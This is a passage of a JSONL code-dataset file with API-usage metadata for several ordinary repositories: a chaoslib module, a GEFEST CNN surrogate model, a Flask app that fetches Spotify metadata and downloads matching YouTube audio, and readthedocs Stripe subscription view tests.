"logzero.logger.fatal", "line_number": 615, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 615, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 594, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 594, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 624, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 625, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 626, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 627, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 628, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 629, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 630, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 631, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 633, "usage_type": "name"}, {"api_name": "concurrent.futures.Future", "line_number": 640, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.InterruptExecution", "line_number": 644, "usage_type": "argument"}, {"api_name": "logzero.logger.fatal", "line_number": 646, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 646, "usage_type": "name"}, {"api_name": "logzero.logger.fatal", "line_number": 649, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 649, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 650, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 650, "usage_type": "name"}, {"api_name": "concurrent.futures.Future", "line_number": 634, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy", "line_number": 668, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 669, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 670, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 671, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 672, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 673, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 675, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 677, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 677, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.InterruptExecution", "line_number": 694, "usage_type": "name"}, {"api_name": "logzero.logger.fatal", "line_number": 700, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 700, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 676, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 676, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 676, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 708, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 709, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 710, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 711, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 712, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 714, "usage_type": "name"}, {"api_name": "logzero.logger.warning", 
"line_number": 720, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 720, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 723, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 723, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 732, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 732, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 737, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 737, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.InterruptExecution", "line_number": 749, "usage_type": "name"}, {"api_name": "logzero.logger.fatal", "line_number": 751, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 751, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 754, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 754, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 763, "usage_type": "name"}, {"api_name": "chaoslib.__version__", "line_number": 765, "usage_type": "name"}, {"api_name": "platform.platform", "line_number": 766, "usage_type": "call"}, {"api_name": "platform.node", "line_number": 767, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 769, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 769, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 763, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 778, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 793, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 793, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 798, "usage_type": "call"}, {"api_name": "logzero.logger.debug", "line_number": 807, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 807, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 812, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 778, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 823, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 817, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 827, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Schedule", "line_number": 828, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 829, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 830, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 831, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 832, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 834, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 840, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 840, "usage_type": "name"}, {"api_name": "chaoslib.hypothesis.run_steady_state_hypothesis", "line_number": 853, "usage_type": "call"}, {"api_name": "logzero.logger.warning", "line_number": 863, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 863, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 875, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 875, 
"usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 887, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 888, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 889, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 890, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 891, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 892, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 894, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 894, "usage_type": "name"}, {"api_name": "chaoslib.control.controls", "line_number": 896, "usage_type": "call"}, {"api_name": "chaoslib.activity.run_activities", "line_number": 907, "usage_type": "call"}, {"api_name": "concurrent.futures.Future", "line_number": 916, "usage_type": "argument"}, {"api_name": "logzero.logger.debug", "line_number": 930, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 930, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 934, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 934, "usage_type": "name"}, {"api_name": "concurrent.futures.TimeoutError", "line_number": 943, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 950, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 951, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 952, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 953, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 954, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 957, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 957, "usage_type": "name"}, {"api_name": "chaoslib.control.controls", "line_number": 958, "usage_type": "call"}, {"api_name": "chaoslib.rollback.run_rollbacks", "line_number": 966, "usage_type": "call"}, {"api_name": "logzero.logger.debug", "line_number": 970, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 970, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 956, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 956, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 987, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 996, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 1009, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 1009, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 1016, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 1016, "usage_type": "name"}, {"api_name": "ctypes.c_long", "line_number": 1023, "usage_type": "call"}, {"api_name": "ctypes.pythonapi.PyGILState_Ensure", "line_number": 1025, "usage_type": "call"}, {"api_name": "ctypes.pythonapi", "line_number": 1025, "usage_type": "attribute"}, {"api_name": "ctypes.pythonapi.PyThreadState_SetAsyncExc", "line_number": 1026, "usage_type": "call"}, {"api_name": "ctypes.pythonapi", "line_number": 1026, "usage_type": "attribute"}, {"api_name": "ctypes.py_object", "line_number": 1027, "usage_type": "call"}, {"api_name": "chaoslib.exceptions.ExperimentExitedException", "line_number": 1027, "usage_type": "argument"}, {"api_name": 
"ctypes.pythonapi.PyGILState_Release", "line_number": 1030, "usage_type": "call"}, {"api_name": "ctypes.pythonapi", "line_number": 1030, "usage_type": "attribute"}]}
+{"seq_id": "12055273979", "text": "import os\nimport shutil\nfrom typing import Optional\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom gefest.core.structure.domain import Domain\nfrom gefest.core.structure.structure import Structure\n\nmatplotlib.use('agg')\n\n\nclass BWCNN:\n \"\"\"\n ::TODO:: Make abstract version to create own realizations for specific tasks\n \"\"\"\n\n \"\"\"\n Surrogate model for breakwaters task\n \"\"\"\n\n def __init__(self, path, domain: Domain, main_model: Optional = None):\n super(BWCNN, self).__init__()\n\n self.domain = domain\n self.model = keras.models.load_model(path)\n self.main_model = main_model\n\n self._create_temp_path()\n self.img_name = 'tmp_images/0.png'\n self.img_size = 128\n self.rate = 4\n\n def _create_temp_path(self):\n \"\"\"\n Creation of temporary folder for images\n :return: None\n \"\"\"\n path = 'tmp_images'\n\n if os.path.exists(path):\n shutil.rmtree(path)\n os.makedirs(path)\n\n return\n\n def _save_as_fig(self, struct: Structure, ax=plt):\n \"\"\"\n Saving structure as image\n :param struct: (Structure)\n :param ax: figure\n :return: None\n \"\"\"\n plt.style.use('dark_background')\n\n polygons = struct.polygons\n poly_area = self.domain.prohibited_area.polygons\n polygons = polygons + poly_area\n\n for poly in polygons:\n if poly.id == 'tmp':\n line_x = [point.x for point in poly.points]\n line_y = [point.y for point in poly.points]\n ax.plot(line_x, line_y, color='white', linewidth=3)\n elif poly.id == 'prohibited_area':\n line_x = [point.x for point in poly.points]\n line_y = [point.y for point in poly.points]\n ax.fill(line_x, line_y, color='white')\n\n elif poly.id == 'prohibited_poly' or 'prohibited_targets':\n line_x = [point.x for point in poly.points]\n line_y = [point.y for point in poly.points]\n ax.plot(line_x, line_y, color='white', linewidth=1)\n\n ax.axis('off')\n ax.axis(xmin=0, xmax=self.domain.max_x)\n ax.axis(ymin=0, ymax=self.domain.max_y)\n ax.savefig(self.img_name, bbox_inches='tight', pad_inches=0)\n ax.close('all')\n\n def _to_tensor(self, struct: Structure):\n \"\"\"\n Transformation structure to binary tensor\n :param struct: (Structure), input structure\n :return: (Tensor), binary matrix with WxHx1 dimension\n \"\"\"\n self._save_as_fig(struct)\n\n image_tensor = tf.io.read_file(self.img_name)\n image_tensor = tf.image.decode_png(image_tensor, channels=1)\n image_tensor = tf.image.resize(image_tensor, (self.img_size, self.img_size))\n image_tensor = image_tensor / 255\n\n return image_tensor\n\n def estimate(self, struct: Structure):\n \"\"\"\n Estimation step\n :param struct: (Structure), input structure\n :return: (Float), performance of structure\n \"\"\"\n tensor = self._to_tensor(struct)\n tensor = tf.reshape(tensor, (1, self.img_size, self.img_size, 1))\n performance = self.model.predict(tensor)[0][0]\n\n if performance < self.rate:\n _, performance = self.main_model.estimate(struct)\n\n return performance\n", "repo_name": "aimclub/GEFEST", "sub_path": "gefest/tools/estimators/DL/bw_surrogate/bw_cnn.py", "file_name": "bw_cnn.py", "file_ext": "py", "file_size_in_byte": 3433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 48, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 13, "usage_type": "call"}, {"api_name": "gefest.core.structure.domain.Domain", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, 
{"api_name": "tensorflow.keras.models.load_model", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 45, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "gefest.core.structure.structure.Structure", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 57, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "gefest.core.structure.structure.Structure", "line_number": 84, "usage_type": "name"}, {"api_name": "tensorflow.io.read_file", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.image.decode_png", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.image.resize", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 94, "usage_type": "attribute"}, {"api_name": "gefest.core.structure.structure.Structure", "line_number": 99, "usage_type": "name"}, {"api_name": "tensorflow.reshape", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "19912457324", "text": "from flask import Flask, request, render_template, send_file\nfrom urllib.request import urlopen\nfrom mutagen.easyid3 import EasyID3, ID3\nfrom mutagen.id3 import APIC as AlbumCover\nfrom mutagen.id3 import USLT\nfrom youtube_search import YoutubeSearch\nfrom pytube import YouTube\nimport base64\nimport requests\nimport json\nimport pyrebase\nfrom telegram import *\nimport moviepy.editor as mp\nfrom os.path import join\nimport os\nimport re\n\nfirebaseConfig = { FIREBASE_CONFIG }\n\ndef generate_code():\n message = \"SPOTIFY_ID:SPOTIFY_SECRET\"\n messageBytes = message.encode('ascii')\n base64Bytes = base64.b64encode(messageBytes)\n return base64Bytes.decode('ascii')\n\ndef get_title(data):\n return data['name']\n\ndef get_album_art(data):\n imageUrl = data['album']['images'][0]['url']\n rawAlbumArt = urlopen(imageUrl).read()\n return rawAlbumArt\n\ndef get_artists(data):\n artists = []\n for item in data['artists']:\n artists.append(item['name'])\n return ', '.join(str(val) for val in artists)\n\ndef get_album_name(data):\n return data['album']['name']\n\ndef get_track_number(data):\n return data['track_number']\n\ndef get_disc_number(data):\n return data['disc_number']\n\ndef get_release_year(data):\n date = data['album']['release_date']\n year = date.split('-')\n return year[0]\n\ndef get_album_artists(data):\n album_artists = []\n for item in data['album']['artists']:\n album_artists.append(item['name'])\n return ', '.join(str(val) for val in album_artists)\n\ntokenUrl = \"https://accounts.spotify.com/api/token\"\nheaders = {}\npayload = {}\n\nheaders['Authorization'] = f\"Basic {generate_code()}\"\npayload['grant_type'] = \"client_credentials\"\n\nr = requests.post(tokenUrl, headers=headers, data=payload)\ntoken = r.json()['access_token']\nheaders = { \"Authorization\": \"Bearer \" + token }\n\nfirebase = pyrebase.initialize_app(firebaseConfig)\ndb = firebase.database()\n\nbot = Bot(BOT_TOKEN)\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET'])\ndef homepage():\n return render_template('home.html')\n\n@app.route('/download/')\ndef download(trackId):\n test = os.listdir('./')\n for item in test:\n if item.endswith(\".mp3\"):\n os.remove(os.path.join('./', item))\n \n #return trackId\n requestUrl = f\"https://api.spotify.com/v1/tracks/{trackId}\"\n response = requests.get(url=requestUrl, headers=headers)\n data = response.json()\n\n results = YoutubeSearch(f\"{get_artists(data)}+{get_title(data)}+audio+only\", max_results=10).to_dict()\n youtubeSongUrl = 'https://youtube.com/' + str(results[0]['url_suffix'])\n\n convertedFileName = f'{get_album_artists(data)}-{get_title(data)}'\n convertedFilePath = join('.',convertedFileName) + '.mp3'\n\n key = db.child('tracks').child(trackId).get()\n \n try:\n f = bot.getFile(key.val()['file_id'])\n f.download(convertedFilePath)\n return send_file(convertedFilePath, as_attachment = True)\n except:\n yt = YouTube(youtubeSongUrl)\n downloadedFilePath = yt.streams.get_audio_only().download(filename=convertedFileName,skip_existing=False)\n\n clip = mp.AudioFileClip(downloadedFilePath)\n clip.write_audiofile(convertedFilePath)\n\n audioFile = EasyID3(convertedFilePath)\n audioFile.delete()\n\n #Saving track info fetched from Spotify\n audioFile['title'] = get_title(data)\n audioFile['tracknumber'] = str(get_track_number(data))\n audioFile['artist'] = get_artists(data)\n audioFile['album'] = get_album_name(data)\n audioFile['albumartist'] = get_album_artists(data)\n audioFile['originaldate'] = 
str(get_release_year(data))\n\n audioFile.save(v2_version=3)\n\n #Saving AlbumArt\n audioFile = ID3(convertedFilePath)\n audioFile['APIC'] = AlbumCover(encoding=3,mime='image/jpeg',type=3,desc='Album Art',data=get_album_art(data))\n audioFile.save(v2_version=3)\n\n #remove unwanted YouTube downloads\n os.remove(downloadedFilePath)\n response = bot.send_audio(chat_id='@spotifydldatabase', title = get_title(data), performer = get_artists(data), audio=open(convertedFilePath, 'rb'))\n file_id = response['audio']['file_id']\n db.child('tracks').child(trackId).set({\"file_id\" : file_id})\n return send_file(convertedFilePath, as_attachment = True)\n\n@app.route('/', methods=['POST'])\ndef getQuery():\n rawQuery = request.form['query']\n if 'open.spotify.com' not in rawQuery:\n return render_template('error.html')\n else:\n if '?' in rawQuery:\n trackId = rawQuery.split('/')[4].split('?')[0]\n else:\n trackId = rawQuery.split('/')[4]\n requestUrl = f\"https://api.spotify.com/v1/tracks/{trackId}\"\n response = requests.get(url=requestUrl, headers=headers)\n data = response.json()\n return render_template(\n 'result.html',\n Uri = data['album']['images'][0]['url'],\n title = get_title(data),\n artists = get_artists(data),\n album = get_album_name(data),\n album_artists = get_album_artists(data),\n year = get_release_year(data),\n preview_url = data['preview_url'],\n trackId = trackId\n )\n\nif __name__ == \"__main__\": \n app.run(threaded = True)\n", "repo_name": "Bugadder/flaskApp", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base64.b64encode", "line_number": 23, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 67, "usage_type": "call"}, {"api_name": "pyrebase.initialize_app", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 84, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 91, "usage_type": "call"}, {"api_name": "youtube_search.YoutubeSearch", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 105, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 107, "usage_type": "call"}, {"api_name": "moviepy.editor.AudioFileClip", "line_number": 110, "usage_type": "call"}, {"api_name": "moviepy.editor", "line_number": 110, "usage_type": "name"}, {"api_name": "mutagen.easyid3.EasyID3", "line_number": 113, "usage_type": "call"}, {"api_name": "mutagen.easyid3.ID3", "line_number": 127, "usage_type": "call"}, {"api_name": "mutagen.id3.APIC", "line_number": 128, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 140, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 140, "usage_type": "name"}, {"api_name": 
"flask.render_template", "line_number": 142, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 151, "usage_type": "call"}]}
+{"seq_id": "26276930133", "text": "from unittest import mock\n\nimport requests_mock\nimport stripe\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase, override_settings\nfrom django.urls import reverse\nfrom django_dynamic_fixture import get\n\nfrom readthedocs.organizations.models import Organization\nfrom readthedocs.subscriptions.models import Plan, Subscription\n\n\n@override_settings(RTD_ALLOW_ORGANIZATIONS=True)\nclass SubscriptionViewTests(TestCase):\n\n \"\"\"Subscription view tests.\"\"\"\n\n def setUp(self):\n self.user = get(User)\n self.organization = get(Organization, stripe_id='123', owners=[self.user])\n self.plan = get(Plan, published=True, slug=settings.ORG_DEFAULT_SUBSCRIPTION_PLAN_SLUG)\n self.subscription = get(\n Subscription,\n organization=self.organization,\n plan=self.plan,\n status='active',\n )\n self.client.force_login(self.user)\n\n def test_active_subscription(self):\n resp = self.client.get(reverse('subscription_detail', args=[self.organization.slug]))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.context['subscription'], self.subscription)\n self.assertContains(resp, 'active')\n # The subscribe form isn't shown, but the manage susbcription button is.\n self.assertContains(resp, 'Manage Subscription')\n self.assertNotContains(resp, 'Create Subscription')\n\n @requests_mock.Mocker(kw='mock_request')\n def test_manage_subscription(self, mock_request):\n payload = {\n 'url': 'https://billing.stripe.com/session/a1b2c3',\n }\n mock_request.post('https://api.stripe.com/v1/billing_portal/sessions', json=payload)\n response = self.client.post(\n reverse(\n 'stripe_customer_portal',\n kwargs={'slug': self.organization.slug},\n ),\n )\n self.assertRedirects(\n response,\n payload.get('url'),\n fetch_redirect_response=False,\n )\n\n @mock.patch(\"readthedocs.subscriptions.managers.stripe.Subscription.create\")\n @mock.patch(\"readthedocs.subscriptions.utils.stripe.Customer.retrieve\")\n @mock.patch(\"readthedocs.subscriptions.utils.stripe.Customer.create\")\n def test_user_without_subscription(\n self, customer_create_mock, customer_retrieve_mock, subscription_create_mock\n ):\n subscription_create_mock.return_value = stripe.Subscription.construct_from(\n values={\n \"id\": \"sub_a1b2c3\",\n \"start_date\": 1610532715.085267,\n \"current_period_end\": 1610532715.085267,\n \"trial_end\": 1610532715.085267,\n \"status\": \"active\",\n },\n key=None,\n )\n customer_retrieve_mock.return_value = stripe.Customer.construct_from(\n values={\"id\": \"cus_a1b2c3\"},\n key=None,\n )\n self.subscription.delete()\n self.organization.refresh_from_db()\n self.assertFalse(hasattr(self.organization, 'subscription'))\n resp = self.client.get(reverse('subscription_detail', args=[self.organization.slug]))\n self.assertEqual(resp.status_code, 200)\n self.organization.refresh_from_db()\n subscription = self.organization.subscription\n self.assertEqual(subscription.status, 'active')\n self.assertEqual(subscription.stripe_id, 'sub_a1b2c3')\n customer_retrieve_mock.assert_called_once()\n customer_create_mock.assert_not_called()\n\n @mock.patch(\"readthedocs.subscriptions.managers.stripe.Subscription.create\")\n @mock.patch(\"readthedocs.subscriptions.utils.stripe.Customer.retrieve\")\n @mock.patch(\"readthedocs.subscriptions.utils.stripe.Customer.create\")\n def test_user_without_subscription_and_customer(\n self, customer_create_mock, customer_retrieve_mock, subscription_create_mock\n ):\n 
subscription_create_mock.return_value = stripe.Subscription.construct_from(\n values={\n \"id\": \"sub_a1b2c3\",\n \"start_date\": 1610532715.085267,\n \"current_period_end\": 1610532715.085267,\n \"trial_end\": 1610532715.085267,\n \"status\": \"active\",\n },\n key=None,\n )\n customer_create_mock.return_value = stripe.Customer.construct_from(\n values={\"id\": \"cus_a1b2c3\"},\n key=None,\n )\n # When stripe_id is None, a new customer is created.\n self.organization.stripe_id = None\n self.organization.save()\n self.subscription.delete()\n self.organization.refresh_from_db()\n self.assertFalse(hasattr(self.organization, 'subscription'))\n self.assertIsNone(self.organization.stripe_id)\n customer_retrieve_mock.reset_mock()\n resp = self.client.get(reverse('subscription_detail', args=[self.organization.slug]))\n self.assertEqual(resp.status_code, 200)\n self.organization.refresh_from_db()\n subscription = self.organization.subscription\n self.assertEqual(subscription.status, 'active')\n self.assertEqual(subscription.stripe_id, 'sub_a1b2c3')\n self.assertEqual(self.organization.stripe_id, 'cus_a1b2c3')\n customer_create_mock.assert_called_once()\n # Called from a signal of .save()\n customer_retrieve_mock.assert_called_once()\n\n def test_user_with_canceled_subscription(self):\n self.subscription.status = 'canceled'\n self.subscription.save()\n resp = self.client.get(reverse('subscription_detail', args=[self.organization.slug]))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.context['subscription'], self.subscription)\n # The Manage Subscription form isn't shown, but the Subscribe is.\n self.assertNotContains(resp, 'Manage Subscription')\n self.assertContains(resp, 'Create Subscription')\n", "repo_name": "yahor22337/yahor-readthedocs", "sub_path": "readthedocs/subscriptions/tests/test_views.py", "file_name": "test_views.py", "file_ext": "py", "file_size_in_byte": 5959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.test.TestCase", "line_number": 16, "usage_type": "name"}, {"api_name": "django_dynamic_fixture.get", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 21, "usage_type": "argument"}, {"api_name": "django_dynamic_fixture.get", "line_number": 22, "usage_type": "call"}, {"api_name": "readthedocs.organizations.models.Organization", "line_number": 22, "usage_type": "argument"}, {"api_name": "django_dynamic_fixture.get", "line_number": 23, "usage_type": "call"}, {"api_name": "readthedocs.subscriptions.models.Plan", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.conf.settings.ORG_DEFAULT_SUBSCRIPTION_PLAN_SLUG", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "django_dynamic_fixture.get", "line_number": 24, "usage_type": "call"}, {"api_name": "readthedocs.subscriptions.models.Subscription", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.reverse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 48, "usage_type": "call"}, {"api_name": "requests_mock.Mocker", "line_number": 41, "usage_type": "call"}, {"api_name": "stripe.Subscription.construct_from", "line_number": 65, "usage_type": "call"}, {"api_name": "stripe.Subscription", "line_number": 65, "usage_type": "attribute"}, {"api_name": "stripe.Customer.construct_from", "line_number": 75, 
"usage_type": "call"}, {"api_name": "stripe.Customer", "line_number": 75, "usage_type": "attribute"}, {"api_name": "django.urls.reverse", "line_number": 82, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 59, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 59, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 60, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 60, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 61, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 61, "usage_type": "name"}, {"api_name": "stripe.Subscription.construct_from", "line_number": 97, "usage_type": "call"}, {"api_name": "stripe.Subscription", "line_number": 97, "usage_type": "attribute"}, {"api_name": "stripe.Customer.construct_from", "line_number": 107, "usage_type": "call"}, {"api_name": "stripe.Customer", "line_number": 107, "usage_type": "attribute"}, {"api_name": "django.urls.reverse", "line_number": 119, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 91, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 91, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 92, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 92, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 93, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 93, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 133, "usage_type": "call"}, {"api_name": "django.test.override_settings", "line_number": 15, "usage_type": "call"}]}
